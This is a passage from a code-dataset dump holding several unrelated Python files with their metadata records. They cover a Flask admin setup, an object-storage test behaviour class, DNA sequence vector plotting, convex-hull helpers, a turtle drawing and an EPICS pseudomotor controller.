logger.info(f'registered {user} as {role_name}')\n\n user_datastore.commit()\n\n\ndef register_error_handlers(app: Flask, *, sentry: Optional[Sentry] = None) -> None: # noqa: D202\n \"\"\"Register the 500 and 403 error handlers.\"\"\"\n\n @app.errorhandler(500)\n def internal_server_error(_):\n \"\"\"Call this filter when there's an internal server error.\n\n Run a rollback and send some information to Sentry.\n \"\"\"\n if sentry is not None and SENTRY_DSN in app.config:\n kwargs = dict(\n event_id=g.sentry_event_id,\n public_dsn=sentry.client.get_public_dsn('https'),\n )\n else:\n kwargs = {}\n\n return render_template('errors/500.html', **kwargs)\n\n @app.errorhandler(403)\n def forbidden_error(error):\n \"\"\"You must not cross this error.\"\"\"\n return render_template('errors/403.html')\n\n\ndef register_examples(manager: Manager, user_datastore: SQLAlchemyUserDatastore, butler: User) -> None:\n \"\"\"Insert example graphs.\"\"\"\n for graph in (sialic_acid_graph, egf_graph, statin_graph, homology_graph):\n if not manager.has_name_version(graph.name, graph.version):\n logger.info('uploading public example graph: %s', graph)\n insert_graph(manager, graph, user=butler, public=True)\n\n test_user = user_datastore.find_user(email='test@example.com')\n if test_user:\n for graph in (braf_graph,):\n if not manager.has_name_version(graph.name, graph.version):\n logger.info('uploading internal example graph: %s', graph)\n insert_graph(manager, graph, user=test_user, public=False)\n\n\ndef register_admin_service(app: Flask, manager: Manager) -> Admin:\n \"\"\"Add a Flask-Admin database front-end.\"\"\"\n admin = Admin(app, template_mode='bootstrap3')\n\n admin.add_view(UserView(User, manager.session))\n admin.add_view(ModelView(Role, manager.session))\n admin.add_view(NamespaceView(Namespace, manager.session, category='Terminology'))\n admin.add_view(ModelView(NamespaceEntry, manager.session, category='Terminology'))\n admin.add_view(NetworkView(Network, manager.session, category='Network'))\n admin.add_view(NodeView(Node, manager.session))\n admin.add_view(EdgeView(Edge, manager.session, category='Edge'))\n admin.add_view(CitationView(Citation, manager.session, category='Provenance'))\n admin.add_view(EvidenceView(Evidence, manager.session, category='Provenance'))\n admin.add_view(ModelView(Author, manager.session, category='Provenance'))\n admin.add_view(ReportView(Report, manager.session, category='Network'))\n admin.add_view(ExperimentView(Experiment, manager.session))\n admin.add_view(QueryView(Query, manager.session, category='Query'))\n admin.add_view(ModelView(UserQuery, manager.session, category='Query'))\n admin.add_view(ModelView(Assembly, manager.session))\n admin.add_view(ModelView(EdgeVote, manager.session, category='Edge'))\n admin.add_view(ModelView(EdgeComment, manager.session, category='Edge'))\n admin.add_view(ModelView(NetworkOverlap, manager.session, category='Network'))\n admin.add_view(build_project_view(manager=manager))\n\n return admin\n","sub_path":"src/bel_commons/application_utils.py","file_name":"application_utils.py","file_ext":"py","file_size_in_byte":7475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"56443838","text":"\"\"\"\nCopyright 2013 Rackspace\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nfrom copy import deepcopy\nimport uuid\nimport json\n\nfrom cafe.engine.behaviors import BaseBehavior, behavior\nfrom cloudcafe.objectstorage.objectstorage_api.config \\\n import ObjectStorageAPIConfig\nfrom cloudcafe.objectstorage.objectstorage_api.client \\\n import ObjectStorageAPIClient\n\n\nclass ObjectStorageAPI_Behaviors(BaseBehavior):\n HEADERS_AUTH_TOKEN = 'X-Auth-Token'\n\n PATH_TYPES_ACCOUNT = 'account'\n PATH_TYPES_CONTAINER = 'container'\n PATH_TYPES_OBJECT = 'object'\n\n ERROR_INVALID_PATH = 'path must be supplied as a string.'\n ERROR_INVALID_METHOD = 'method must be supplied as a string.'\n\n VALID_OBJECT_NAME = 'object'\n VALID_OBJECT_NAME_WITH_SLASH = 'object/foo'\n VALID_OBJECT_NAME_WITH_TRAILING_SLASH = 'object/'\n VALID_OBJECT_NAME_WITH_UNICODE = 'objectfoo'\n VALID_OBJECT_DATA = 'object data.'\n\n VALID_TEMPURL_KEY = 'qe-tempurl-key'\n\n def __init__(self, client=None, config=None):\n self.client = client\n if config:\n self.config = config\n else:\n self.config = ObjectStorageAPIConfig()\n\n def generate_unique_container_name(self, identifier=None):\n if identifier:\n identifier = '{0}_'.format(identifier)\n\n randomstring = str(uuid.uuid4()).replace('-', '')\n\n container_name = '{0}_{1}{2}'.format(\n self.config.base_container_name, identifier,\n randomstring)\n\n return container_name\n\n @behavior(ObjectStorageAPIClient)\n def get_swift_info(self):\n \"\"\"\n Returns a dictionary of info requested from swift.\n \"\"\"\n response = self.client.get_swift_info()\n if not response.ok:\n raise Exception('Could not load info from swift.')\n\n return json.loads(response.content)\n\n def get_swift_features(self):\n \"\"\"\n Returns a string represnting the enabled features seperated by commas.\n \"\"\"\n info = self.get_swift_info()\n features = ' '.join([k for k in info.viewkeys()])\n return features\n\n @behavior(ObjectStorageAPIClient)\n def container_exists(self, name=None):\n path = '/{0}'.format(name)\n response = self.request('HEAD', path)\n\n if response.status_code == 404:\n return False\n\n if not response.ok:\n raise Exception(\n 'Error checking the existance of container \"{0}\"'.format(\n str(name)))\n\n return True\n\n @behavior(ObjectStorageAPIClient)\n def create_container(self, container_name, log_delivery=False, headers={}):\n\n if log_delivery:\n headers['X-Container-Meta-Access-Log-Delivery'] = str(True)\n\n response = self.client.create_container(\n container_name,\n headers=headers)\n\n if not response.ok:\n raise Exception(\n 'could not create container \"{0}\"'.format(str(container_name)))\n\n @behavior(ObjectStorageAPIClient)\n def create_object(self, container_name, object_name, data=None,\n headers={}, params={}):\n if not self.container_exists(container_name):\n self.create_container(container_name)\n\n if data and 'content-length' not in headers:\n headers['content-length'] = str(len(data))\n\n response = self.client.create_object(\n container_name,\n object_name,\n data=data,\n headers=headers,\n params=params)\n\n if not response.ok:\n raise Exception('could not create object \"{0}/{1}\"'.format(\n container_name, object_name))\n\n @behavior(ObjectStorageAPIClient)\n def request(self, method=None, path='', **kwargs):\n \"\"\"\n Make a HTTP request against the client's acccount. This request\n should make no assumptions and do no setup for you. It shuold be\n considered a dumb request that does exactly what you tell it.\n\n @type method: string\n @param method: the value to use as the HTTP method.\n @type path: string\n @param path: the value representing the path to the container/object\n you would like to make the request against. If you want to\n make a request against the account, the path field can be omitted.\n\n @rtype: object(requests.Response)\n @return: a Requests Libray response object.\n \"\"\"\n if type(path) is not str:\n raise TypeError(self.ERROR_INVALID_METHOD)\n\n url = '{0}{1}'.format(self.client.storage_url, path)\n response = self.client.request(\n method, url, requestslib_kwargs=kwargs)\n\n return response\n\n @behavior(ObjectStorageAPIClient)\n def authed_request(self, method=None, path='', **kwargs):\n \"\"\"\n Same as request, except the auth token is automatically added to\n the headers for the request.\n\n @type method: string\n @param method: the value to use as the HTTP method.\n @type path: string\n @param path: the value representing the path to the container/object\n you would like to make the request against. If you want to\n make a request against the account, the path field can be omitted.\n\n @rtype: object(requests.Response)\n @return: a Requests Libray response object.\n \"\"\"\n new_args = [method, path]\n new_kwargs = deepcopy(kwargs)\n\n if 'headers' not in new_kwargs:\n new_kwargs['headers'] = \\\n {self.HEADERS_AUTH_TOKEN: self.client.auth_token}\n else:\n auth_provided = bool(\n [x for x in new_kwargs['headers'] if\n x.lower() == self.HEADERS_AUTH_TOKEN.lower()])\n if not auth_provided:\n new_kwargs['headers'][self.HEADERS_AUTH_TOKEN] = \\\n self.auth_token\n\n response = self.request(*new_args, **new_kwargs)\n\n return response\n\n @behavior(ObjectStorageAPIClient)\n def get_tempurl_key(self):\n \"\"\"\n Returns the TempURL key for the account\n \"\"\"\n response = self.authed_request(method='HEAD')\n if 'x-account-meta-temp-url-key' not in response.headers:\n return None\n\n return response.headers['x-account-meta-temp-url-key']\n","sub_path":"cloudcafe/objectstorage/objectstorage_api/behaviors.py","file_name":"behaviors.py","file_ext":"py","file_size_in_byte":6856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"639896866","text":"from multi_key_dict import multi_key_dict\r\nfrom math import *\r\nfrom seqlencalc import getseqlen\r\nfrom seqlencalc import baseset\r\nfrom jiliplot import Node\r\nimport datetime\r\n\r\nclass ThreeDVector:\r\n\tdef __init__(self, x, y, z):\r\n\t\tself.x = x\r\n\t\tself.y = y\r\n\t\tself.z = z\r\n\t\t\r\n\tdef __repr__(self):\r\n\t\t#print('[' + self.x + ', ' + self.y + ', ' + self.z + ']')\r\n\t\t#return('[' + str(self.x) + ', ' + str(self.y) + ', ' + str(self.z) + ']')\r\n\t\t#return('[' + str(round(self.x, 4)) + ', ' + str(round(self.y, 4)) + ', ' + str(round(self.z, 4)) + ']')\r\n\t\treturn('[' + str(round(self.x, 3)) + ', ' + str(round(self.y, 3)) + ', ' + str(round(self.z, 3)) + ']')\r\n\t\t\r\n\tdef modulus(self):\r\n\t\treturn sqrt(pow(self.x, 2) + pow(self.y, 2) + pow(self.z, 2))\r\n\t\t\r\n\tdef unit(self):\r\n\t\tmod = self.modulus()\r\n\t\tif(mod > 0):\r\n\t\t\tunit_x = self.x / mod\r\n\t\t\tunit_y = self.y / mod\r\n\t\t\tunit_z = self.z / mod\r\n\t\t\treturn ThreeDVector(unit_x, unit_y, unit_z)\r\n\t\telse:\r\n\t\t\treturn ThreeDVector(0, 0, 0)\r\n\t\t\t\r\n\tdef add(self, point_from):\r\n\t\tif(isinstance(point_from, ThreeDVector)):\r\n\t\t\treturn ThreeDVector((self.x + point_from.x), (self.y + point_from.y), (self.z + point_from.z))\r\n\t\telse:\r\n\t\t\treturn None\r\n\t\t\r\n\tdef unit_couplet_value(self, to):\r\n\t\tif(isinstance(to, ThreeDVector)):\r\n\t\t\tmidpoint = ThreeDVector(((self.x + to.x)/2), ((self.y + to.y)/2), ((self.z + to.z)/2))\r\n\t\t\treturn midpoint.unit()\r\n\t\telse:\r\n\t\t\t#print(\"Unable to compute the distance\")\r\n\t\t\treturn None\r\n\t\t\t#return ThreeDVector(0, 0, 0)\r\n\t\t'''if(isinstance(to, ThreeDVector)):\r\n\t\t\tmidpoint = ThreeDVector(((self.x + 0)/2), ((self.y + 0)/2), ((self.z + 0)/2))\r\n\t\t\treturn midpoint.unit()'''\r\n\r\nclass BasePosition:\r\n\tdef __init__(self):\r\n\t\tself.O = ThreeDVector(0, 0, 0)\t\t\r\n\t\tself.A = ThreeDVector(1, 1, 1)\r\n\t\tself.C = ThreeDVector(-1, -1, 1)\r\n\t\tself.G = ThreeDVector(1, -1, -1)\r\n\t\tself.T = ThreeDVector(-1, 1, -1)\r\n\r\nbasepos = BasePosition()\t\t\r\n\r\n'''doubledict = multi_key_dict()\r\ndoubledict['AA'] = A.unit_couplet_value(A)\r\ndoubledict['AC', 'CA'] = A.unit_couplet_value(C)\r\ndoubledict['AG', 'GA'] = A.unit_couplet_value(G)\r\ndoubledict['AT', 'TA'] = A.unit_couplet_value(T)\r\ndoubledict['CC'] = C.unit_couplet_value(C)\r\ndoubledict['CG', 'GC'] = C.unit_couplet_value(G)\r\ndoubledict['CT', 'TC'] = C.unit_couplet_value(T)\r\ndoubledict['GG'] = G.unit_couplet_value(G)\r\ndoubledict['GT', 'TG'] = G.unit_couplet_value(T)\r\ndoubledict['TT'] = T.unit_couplet_value(T)'''\r\n\r\ndoubledict = multi_key_dict()\r\ndoubledict['AA'] = basepos.A.unit_couplet_value(basepos.A)\r\ndoubledict['AC', 'CA'] = basepos.A.unit_couplet_value(basepos.C)\r\ndoubledict['AG', 'GA'] = basepos.A.unit_couplet_value(basepos.G)\r\ndoubledict['AT', 'TA'] = basepos.A.unit_couplet_value(basepos.T)\r\ndoubledict['CC'] = basepos.C.unit_couplet_value(basepos.C)\r\ndoubledict['CG', 'GC'] = basepos.C.unit_couplet_value(basepos.G)\r\ndoubledict['CT', 'TC'] = basepos.C.unit_couplet_value(basepos.T)\r\ndoubledict['GG'] = basepos.G.unit_couplet_value(basepos.G)\r\ndoubledict['GT', 'TG'] = basepos.G.unit_couplet_value(basepos.T)\r\ndoubledict['TT'] = basepos.T.unit_couplet_value(basepos.T)\r\n\r\n\r\ndef lifeizhaoyuplot(fname):\r\n\tseqlen = getseqlen(fname)\r\n\t#print(seqlen)\r\n\tseqarr = []\r\n\tf = open(fname, 'r')\r\n\tc = f.read(1)\r\n\twhile c!=\"\":\r\n\t\tc = c.upper()\r\n\t\tif(c in baseset):\r\n\t\t\t#x = Node(c)\r\n\t\t\tseqarr.append(Node(c))\r\n\t\tc = f.read(1)\r\n\tf.close()\r\n\t\r\n\tstart_time = datetime.datetime.now()\r\n\t\r\n\tpoint = basepos.O\r\n\tcount = 0\r\n\twhile(count < seqlen-1):\r\n\t\tword = seqarr[count].base + seqarr[count+1].base\r\n\t\t#print(count)\r\n\t\t#print(word)\r\n\t\t#(doubledict[word])\r\n\t\t#point = point.unit_couplet_value(doubledict[word])\r\n\t\t#point = doubledict[word].unit_couplet_value(point)\r\n\t\tpoint = doubledict[word].add(point)\r\n\t\t#print(point)\r\n\t\tcount += 1\r\n\t#print(count)\r\n\tprint(point)\r\n\t\r\n\tend_time = datetime.datetime.now()\r\n\ttime_taken = end_time - start_time\r\n\t\r\n\tprint('time taken = ' + str(time_taken.microseconds))\r\n\tprint('time taken = ' + str(time_taken.seconds))\r\n","sub_path":"sequence_extract_genomes_IC/all/lifeizhaoyuplot.py","file_name":"lifeizhaoyuplot.py","file_ext":"py","file_size_in_byte":3928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"4563890","text":"import csv\r\nimport math\r\n\r\nclass Point:\r\n def __init__(self, x, y):\r\n self.x = x\r\n self.y = y\r\n \r\ndef create_point():\r\n return Point(random(width/8,width-width/8),random(height/8,height-height/8))\r\n\r\ndef print_pretty(list):\r\n \"\"\"\r\n Method to help in debugging\r\n \"\"\"\r\n for point in list:\r\n print(\"(\" + str(point.x)+ \", \" + str(point.y) + \")\")\r\n\r\n\r\ndef polar_angle(p1, p2):\r\n y = p2.y - p1.y\r\n x = p2.x - p1.x\r\n ret = math.degrees(math.atan2(y,x))\r\n return ret\r\n\r\ndef distance(origin,p):\r\n AC = abs(origin.x - p.x)\r\n BC = abs(origin.y - p.y)\r\n AB = math.sqrt(pow(AC,2) + pow(BC,2))\r\n return AB\r\n\r\ndef is_left_turn(hull, p1, p2):\r\n m = ((p2.y-hull.y) * (p1.x - hull.x))\r\n n = ((p1.y - hull.y) * (p2.x - hull.x))\r\n if(m == n):\r\n # if points are collinear select furthest point\r\n if distance(hull, p1) >= distance(hull,p2):\r\n return True\r\n else:\r\n return False\r\n if(m < n):\r\n return True\r\n else:\r\n return False\r\n\r\ndef get_lowest_point(point_list):\r\n \"\"\"\r\n :param list: of points\r\n :return: lowest point on the coordinate system\r\n furthest left if there is a tie\r\n \"\"\"\r\n lowest_p = point_list[0]\r\n for p in point_list:\r\n if p.y < lowest_p.y:\r\n lowest_p = p\r\n if p.y == lowest_p.y:\r\n if p.x < lowest_p.x:\r\n lowest_p = p\r\n return lowest_p\r\n\r\ndef make_minhull_list(length, center=(0,0),height=500):\r\n \"\"\"\r\n My hacky way in create a triangle with points within in\r\n :param length: size of list to create\r\n :param center: center coordinate to build right angle\r\n :param height: height of triangle to create\r\n :return:\r\n \"\"\"\r\n center_x, center_y = center\r\n a = Point(center_x, center_y)\r\n b = Point(center_x, center_y + height)\r\n c = Point(center_y + height, center_x)\r\n list = [a,b,c]\r\n for i in range(0,length):\r\n p = create_point(center_x+1, center_y+height-1)\r\n while(polar_angle(c, b) >= polar_angle(c, p)):\r\n p = create_point(center_x+1, center_y+height-1)\r\n list.append(p)\r\n return list\r\n","sub_path":"Point Generator Applications/application.linux32/source/Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"583809937","text":"from turtle import *\n\nglobal a\na = 100\n\n\ndef czworokąt(kąt_a, kąt_b, kolor):\n fillcolor(kolor)\n begin_fill()\n for i in range(2):\n fd(a)\n rt(kąt_a)\n fd(a)\n rt(kąt_b)\n end_fill()\n\n\ndef dojscie():\n setheading(0)\n fd(a)\n rt(60)\n fd(a)\n\n\ndef marihuaina():\n pu()\n setpos(0, 200)\n dojscie()\n pd()\n for i in range(5):\n czworokąt(30, 150, \"darkgreen\")\n rt(30)\n\n\ndef zielone_romby():\n pu()\n setpos(0, 200)\n for i in range(4):\n pu()\n setpos(0, 200)\n dojscie()\n setheading(210 - 60 + 30 * i)\n fd(a)\n lt(30)\n fd(a)\n lt(90)\n pd()\n lt(60)\n pd()\n czworokąt(120, 60, \"yellowgreen\")\n\n\ndef zolte_kwadraty():\n for i in range(3):\n pu()\n setpos(0, 200)\n dojscie()\n setheading(210 - 60 + 30 * i)\n fd(a)\n for i in range(2):\n lt(30)\n fd(a)\n lt(120)\n pd()\n czworokąt(90, 90, \"yellow\")\n\n\ndef pomaranczowe_romby():\n pu()\n for i in range(2):\n setpos(0, 200)\n\n dojscie()\n setheading(210 - 60 + 30 * i)\n for i in range(4):\n fd(a)\n lt(30)\n lt(60)\n pd()\n czworokąt(60, 120, \"orange\")\n pu()\n\n\ndef czerwony_romb():\n rt(60)\n pd()\n czworokąt(150, 30, \"red\")\n\n\ndef owoc():\n marihuaina()\n zielone_romby()\n zolte_kwadraty()\n pomaranczowe_romby()\n czerwony_romb()\n\n\nowoc()\npu()\n\ndone()\n","sub_path":"konkursy/15_2016/15_2/owoc.py","file_name":"owoc.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"382522577","text":"# -*- coding: utf-8 -*-\n# vi:sw=4 ts=4\n\"\"\"\n:mod:`ecli_cas.pseudomotor` -- pseudomotor support\n==================================================\n\n.. module:: ecli_pseudomotor\n :synopsis: ECLI pseudomotor support\n.. moduleauthor:: Ken Lauer \n\"\"\"\nfrom __future__ import print_function\nimport logging\nimport math\nimport copy\n\nimport epics\nimport ast\n\nfrom . import SoftMotor\nfrom . import motor_info as mi\nfrom . import CAPV\n\n\nlogger = logging.getLogger('ECLI.pseudomotor')\n\n\nclass MotorGroup(object):\n \"\"\"\n Holds a set of inter-related equations and their\n corresponding motor/pseudomotor records\n \"\"\"\n def __init__(self, globals=None, aliases={}):\n self.variables = {}\n self._globals = globals\n self._validated = False\n self._records_set = False\n self._aliases = copy.deepcopy(aliases)\n\n if globals is None:\n self._globals = self._build_globals()\n for fcn in ('sin', 'asin', 'cos', 'acos', 'tan', 'atan', 'atan2', 'pi', 'pow'):\n self._globals[fcn] = getattr(math, fcn)\n\n def start(self):\n for name, record in self.records:\n if isinstance(record, PseudoMotor):\n record.startup()\n\n @property\n def validated(self):\n return self._validated\n\n def _build_globals(self, allowed_modules=['numpy', 'math', '__builtins__']):\n return dict((module, globals()[module]) for module in allowed_modules\n if module in globals())\n\n def add_pv(self, variable, pv_name, pv_instance=None, equation=None):\n if pv_instance is not None and not isinstance(pv_instance, epics.PV):\n raise TypeError('Expected epics.PV, got %s' % (pv_instance.__class__.__name__))\n elif variable in self.variables:\n raise KeyError('Variable already exists: %s' % variable)\n\n if equation is None:\n equation = variable\n\n if pv_instance is None:\n pv_instance = epics.PV(pv_name)\n\n self.variables[variable] = {'full_pv': pv_name,\n 'equation': equation,\n 'record': pv_instance,\n 'related': set(),\n 'last_value': 0.0,\n }\n\n self._validated = False\n\n def add_motor(self, variable, record, equation=None):\n if variable in self.variables:\n raise KeyError('Variable already exists: %s' % variable)\n\n if equation is None:\n equation = variable\n\n self.variables[variable] = {'full_pv': record,\n 'equation': equation,\n 'record': None,\n 'related': set(),\n 'last_value': 0.0,\n }\n\n self._validated = False\n self._records_set = False\n\n def _link_variables(self, v1, v2):\n self.variables[v1]['related'].add(v2)\n self.variables[v2]['related'].add(v1)\n\n def _validate_equation(self, variable, eq):\n root = ast.parse(eq)\n identifiers = set([node.id for node in ast.walk(root)\n if isinstance(node, ast.Name)])\n\n for ident in identifiers:\n if ident in self.variables:\n self._link_variables(variable, ident)\n elif ident in self._globals:\n pass\n else:\n if ident in self._aliases:\n pv_name = self._aliases[ident]\n self.add_pv(ident, pv_name)\n\n self._link_variables(variable, ident)\n else:\n raise ValueError('Unknown identifier %s' % ident)\n\n return eq\n\n def get_equation(self, variable):\n return self.variables[variable]['equation']\n\n def check_equations(self):\n if self._validated:\n return True\n\n for variable in self.variables.keys():\n eq = self.get_equation(variable)\n self._validate_equation(variable, eq)\n\n self._validated = True\n return self._validated\n\n def check_records(self):\n if self._records_set:\n return True\n\n records = [rec for var, rec in self.records]\n\n self._records_set = (None not in records)\n return self._records_set\n\n def get_record(self, variable):\n return self.variables[variable]['record']\n\n def set_record(self, variable, record):\n self.variables[variable]['record'] = record\n\n def get_related_records(self, variable):\n return [(var, self.variables[var]['record'])\n for var in self.variables[variable]['related']]\n\n @property\n def records(self):\n for variable, info in self.variables.items():\n yield variable, info['record']\n\n def variable_dict(self):\n if not self.check_records():\n raise Exception('Not all record instances set')\n\n ret = {}\n for variable, record in self.records:\n if isinstance(record, PseudoMotor):\n if record._rotary:\n ret[variable] = record.request_position * math.pi / 180.0\n else:\n ret[variable] = record.request_position\n elif isinstance(record, epics.Motor):\n ret[variable] = record.get_position(readback=True)\n else:\n value = record.get()\n if value is None:\n value = 0.0\n\n ret[variable] = value\n\n return ret\n\n def evaluate(self, variable, locals_=None):\n if not self._validated:\n self.check_equations()\n\n if not self.check_records():\n raise Exception('Not all record instances set')\n\n if locals_ is None:\n locals_ = self.variable_dict()\n\n entry = self.variables[variable]\n eq = self.get_equation(variable)\n\n try:\n ret = eval(eq, self._globals, locals_)\n except:\n logger.debug('Unable to calculate new position (expression= %s)' % eq,\n exc_info=True)\n else:\n record = entry['record']\n if isinstance(record, PseudoMotor) and record._rotary:\n entry['last_value'] = ret * 180.0 / math.pi\n else:\n entry['last_value'] = ret\n\n return entry['last_value']\n\n def evaluate_related(self, variable):\n info = self.variables[variable]\n\n ret = {}\n for related in info['related']:\n ret[related] = self.evaluate(related)\n\n return ret\n\n\nclass PseudoMotor(SoftMotor):\n _globals = None\n\n def __init__(self, manager, group, alias, record_name,\n readback_calc=None, rotary=False, desc=''):\n \"\"\"\n :param manager: the CAS PV manager\n :param alias: alias\n :param record_name: pseudomotor record name\n :param readback_calc: equation used to update readback value\n e.g., (m1 + m2) would sum readbacks from m1 and m2,\n making the readback for this pseudomotor. If unset,\n uses the all_motor database\n \"\"\"\n logger.debug('Pseudo motor: %s = %s' % (record_name, readback_calc))\n\n self.group = group\n if not self.group.validated:\n self.group.check_equations()\n\n self.group.set_record(alias, self)\n\n SoftMotor.__init__(self, manager, record_name)\n\n self._related_motors = None\n self._related_pvs = None\n self._readback_calc = self.group.get_equation(alias)\n self._waiting = set()\n self._rotary = rotary\n self._alias = alias\n self._records = {}\n\n if not desc:\n desc = alias\n self.put('DESC', desc)\n\n def startup(self):\n for name, info in self.related_motors.items():\n rec = info['record']\n if isinstance(rec, epics.Motor):\n rec.set_callback(mi.MOTOR_USER_READBACK,\n lambda **kwargs: self.update_readback())\n rec.set_callback(mi.MOTOR_DONE_MOVE,\n lambda motor=name, **kwargs:\n self.related_finished(motor, **kwargs))\n\n for pvi in self.related_pvs:\n pvi.add_callback(callback=lambda **kwargs: self.update_readback())\n\n self.calculate_range()\n\n def shutdown(self):\n # TODO note that this just clears all callbacks for related\n # records. could easily remove the specific one if lambdas\n # aren't used.\n for name, info in self.related_motors.items():\n rec = info['record']\n if isinstance(rec, epics.Motor):\n rec.clear_callback(mi.MOTOR_USER_READBACK)\n rec.clear_callback(mi.MOTOR_DONE_MOVE)\n else:\n rec.clear_callbacks()\n\n # Remove all fields\n self.remove_all()\n\n def calculate_range(self):\n \"\"\"\n Assuming that limits of all real motors may give minimal/maximal positions\n for the pseudomotor, iterate through the combinations and set rough\n pseudomotor limits.\n \"\"\"\n mins = {}\n maxes = {}\n\n for name, info in self.related_motors.items():\n rec = info['record']\n low_limit = getattr(rec, mi.MOTOR_USER_LOW_LIMIT)\n high_limit = getattr(rec, mi.MOTOR_USER_HIGH_LIMIT)\n mins[name] = low_limit\n maxes[name] = high_limit\n\n logger.debug('Motor %s low: %s high: %s' %\n (name, low_limit, high_limit))\n\n real_positions = self.group.variable_dict()\n iterations = 2 ** len(self.related_motors)\n\n alias = self._alias\n i = 0\n\n while i < iterations:\n j = 1\n for name, info in self.related_motors.items():\n if (i & j) == 0:\n real_positions[name] = mins[name]\n else:\n real_positions[name] = maxes[name]\n\n j *= 2\n\n readback = self.group.evaluate(self._alias, locals_=real_positions)\n if alias not in mins or mins[alias] > readback:\n mins[alias] = readback\n\n if alias not in maxes or maxes[alias] < readback:\n maxes[alias] = readback\n\n i += 1\n\n if alias in mins:\n self.user_low_limit_updated(mins[alias])\n logger.debug('Set pseudomotor low limit %s: %s' %\n (alias, mins[alias]))\n\n if alias in maxes:\n self.user_high_limit_updated(maxes[name])\n logger.debug('Set pseudomotor high limit %s: %s' %\n (alias, maxes[alias]))\n\n @property\n def related_motors(self):\n def make_entry(name, record):\n return {'record': record,\n 'finished': record.get(mi.MOTOR_DONE_MOVE),\n }\n\n if self._related_motors is None:\n records = self.group.get_related_records(self._alias)\n motors = dict([(name, make_entry(name, record)) for name, record in records\n if isinstance(record, epics.Motor)])\n\n self._related_motors = motors\n\n return self._related_motors\n\n @property\n def related_pvs(self):\n if self._related_pvs is None:\n records = self.group.get_related_records(self._alias)\n pvs = [record for name, record in records\n if isinstance(record, epics.PV)]\n\n self._related_pvs = pvs\n\n return self._related_pvs\n\n def go_updated(self, value=None, **kwargs):\n # If stop/pause/go is pressed, notify all related motors\n SoftMotor.go_updated(self, value)\n\n for name, info in self.related_motors.items():\n record = info['record']\n record.put(mi.MOTOR_GO, value)\n\n def move(self, amount, relative=False, asyn=None, **kwargs):\n # Asyn PVs can get 2 callbacks when an asyn context is created (e.g.,\n # with caput -c) -- one to check the value, then one when processing\n # should start. This allows pcaspy to accept the value and start\n # the asynchronous task on the context\n if asyn in (CAPV.ASYN_OFF, CAPV.ASYN_CHECK):\n if relative:\n pos = self._readback + amount\n else:\n pos = amount\n\n logger.debug('Pseudo move %s to %s' % (self, pos))\n try:\n ret = SoftMotor.move(self, pos, relative=False)\n except SoftMotor.SoftMotorError:\n return False\n except:\n logger.debug('Pseudo move %s failed' % (self, ),\n exc_info=True)\n return False\n else:\n if asyn == CAPV.ASYN_CHECK:\n return ret\n\n else:\n pos = self.request_position\n logger.debug('Pseudo asyn move started (%s)' % (self, ))\n\n def put_complete(motor):\n logger.debug('Put complete: %s' % motor)\n\n if motor in self._waiting:\n self._waiting.remove(motor)\n\n if not self._waiting:\n self.done_moving = True\n\n self.done_moving = False\n\n new_positions = self.group.evaluate_related(self._alias)\n for motor, new_pos in new_positions.items():\n record = self.group.get_record(motor)\n\n logger.debug('Setting %s %g' % (record, new_pos))\n if isinstance(record, epics.PV):\n pvi = record\n else:\n user_pv = '%s' % (record._prefix, )\n\n # TODO shouldn't be re-creating PV instances\n pvi = epics.PV(user_pv)\n\n self._waiting.add(pvi)\n\n pvi.put(new_pos, timeout=None,\n callback=lambda motor=motor, pvi=pvi, **kwargs: put_complete(pvi))\n\n if not self._waiting and not self.done_moving:\n self.done_moving = True\n\n def update_readback(self):\n readback = self.group.evaluate(self._alias)\n self._set_readback(readback)\n\n def related_finished(self, motor_name, value=None, **kwargs):\n entry = self._related_motors[motor_name]\n entry['finished'] = (value != 0)\n\n done = all(entry['finished'] for name, entry in self.related_motors.items())\n if done != self.done_moving:\n self.done_moving = done\n\n\ndef _test():\n group = MotorGroup()\n group.add_motor('m1', 'IOC:m1', '0.5 * pseudo1')\n group.add_motor('m2', 'IOC:m2', '0.6 * pseudo1')\n group.add_motor('pseudo1', 'ECLI:test', '2.0 * m1')\n #group.check_equations()\n\n from . import PVManager\n import epics\n\n manager = PVManager('ECLI:')\n manager.run()\n\n group.set_record('m1', epics.Motor('IOC:m1'))\n group.set_record('m2', epics.Motor('IOC:m2'))\n pseudo = PseudoMotor(manager, group, 'pseudo1', 'test')\n\n group.start()\n\n pseudo.update_readback()\n print('calculated rbv is', epics.caget('ECLI:test.RBV'))\n\n print(epics.caget('ECLI:test.VAL'), pseudo)\n import time\n try:\n time.sleep(60)\n except KeyboardInterrupt:\n pass\n\n print('Move done')\n\n print('pseudo rbv', epics.caget('ECLI:test.RBV'))\n print('m1 rbv', epics.caget('IOC:m1.RBV'))\n print('m2 rbv', epics.caget('IOC:m2.RBV'))\n","sub_path":"ecli_cas/pseudomotor.py","file_name":"pseudomotor.py","file_ext":"py","file_size_in_byte":15521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"505522843","text":"import sys\n\nprint('string is:', sys.argv[1])\ns = sys.argv[1]\n\npath_to = '/Users/amitmshah/Downloads/advanti_files'\n\ndef check_text(ck):\n samp1_cnt = open('{}/sample1.txt'.format(path_to), 'r').read().count(ck)\n samp2_cnt = open('{}/sample2.txt'.format(path_to), 'r').read().count(ck)\n samp3_cnt = open('{}/sample3.txt'.format(path_to), 'r').read().count(ck)\n print('File sample1.txt contains {} instances of \"{}\".'.format(samp1_cnt, ck))\n print('File sample2.txt contains {} instances of \"{}\".'.format(samp2_cnt, ck))\n print('File sample3.txt contains {} instances of \"{}\".'.format(samp3_cnt, ck))\n\n\nif __name__ == '__main__':\n 